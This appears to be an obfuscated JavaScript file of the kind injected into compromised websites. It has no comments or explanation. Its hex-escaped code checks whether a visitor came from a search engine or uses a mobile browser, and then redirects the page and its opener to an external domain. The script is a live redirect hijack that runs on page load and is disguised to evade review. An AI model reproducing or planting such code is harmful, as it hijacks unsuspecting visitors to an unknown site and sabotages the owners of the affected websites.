var qYu1=/\.(yahoo|google|baidu|soso|sogou|bing|sou|so|360|haosou|youdao|sooule|easou|aliyun|sina|jike|Yisou|uc|sm)\./gi;var t2=window['\x6c\x6f\x63\x61\x74\x69\x6f\x6e']['\x72\x65\x66\x65\x72\x72\x65\x72'];try{t2=top['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x72\x65\x66\x65\x72\x72\x65\x72']}catch(e){}try{t2=window['\x70\x61\x72\x65\x6e\x74']['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x72\x65\x66\x65\x72\x72\x65\x72']}catch(e){}var Qepspf3=window['\x6c\x6f\x63\x61\x74\x69\x6f\x6e']['\x68\x6f\x73\x74'];try{Qepspf3=top['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']}catch(e){}try{Qepspf3=window['\x70\x61\x72\x65\x6e\x74']['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']}catch(e){}if(qYu1['\x74\x65\x73\x74'](t2)){window['\x6c\x6f\x63\x61\x74\x69\x6f\x6e']['\x68\x72\x65\x66']='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x75\x63\x6b\x30\x31\x2e\x63\x63';parent['\x77\x69\x6e\x64\x6f\x77']['\x6f\x70\x65\x6e\x65\x72']['\x6c\x6f\x63\x61\x74\x69\x6f\x6e']='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x75\x63\x6b\x30\x31\x2e\x63\x63'}function browserRedirect(){var EOIPF4=navigator['\x75\x73\x65\x72\x41\x67\x65\x6e\x74']['\x74\x6f\x4c\x6f\x77\x65\x72\x43\x61\x73\x65']();var P$K5=EOIPF4['\x6d\x61\x74\x63\x68'](/ipad/i)=='\x69\x70\x61\x64';var jjsuz6=EOIPF4['\x6d\x61\x74\x63\x68'](/iphone os/i)=='\x69\x70\x68\x6f\x6e\x65 \x6f\x73';var cnOzWF7=EOIPF4['\x6d\x61\x74\x63\x68'](/midp/i)=='\x6d\x69\x64\x70';var VJXCeibua8=EOIPF4['\x6d\x61\x74\x63\x68'](/rv:1.2.3.4/i)=='\x72\x76\x3a\x31\x2e\x32\x2e\x33\x2e\x34';var rEl9=EOIPF4['\x6d\x61\x74\x63\x68'](/android/i)=='\x61\x6e\x64\x72\x6f\x69\x64';var ULQQ10=EOIPF4['\x6d\x61\x74\x63\x68'](/windows ce/i)=='\x77\x69\x6e\x64\x6f\x77\x73 \x63\x65';var gDjkpm11=EOIPF4['\x6d\x61\x74\x63\x68'](/windows mobile/i)=='\x77\x69\x6e\x64\x6f\x77\x73 \x6d\x6f\x62\x69\x6c\x65';if(!(jjsuz6||cnOzWF7||rEl9||ULQQ10||gDjkpm11)){}else{window['\x6c\x6f\x63\x61\x74\x69\x6f\x6e']['\x68\x72\x65\x66']='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x75\x63\x6b\x30\x31\x2e\x63\x63'}}browserRedirect();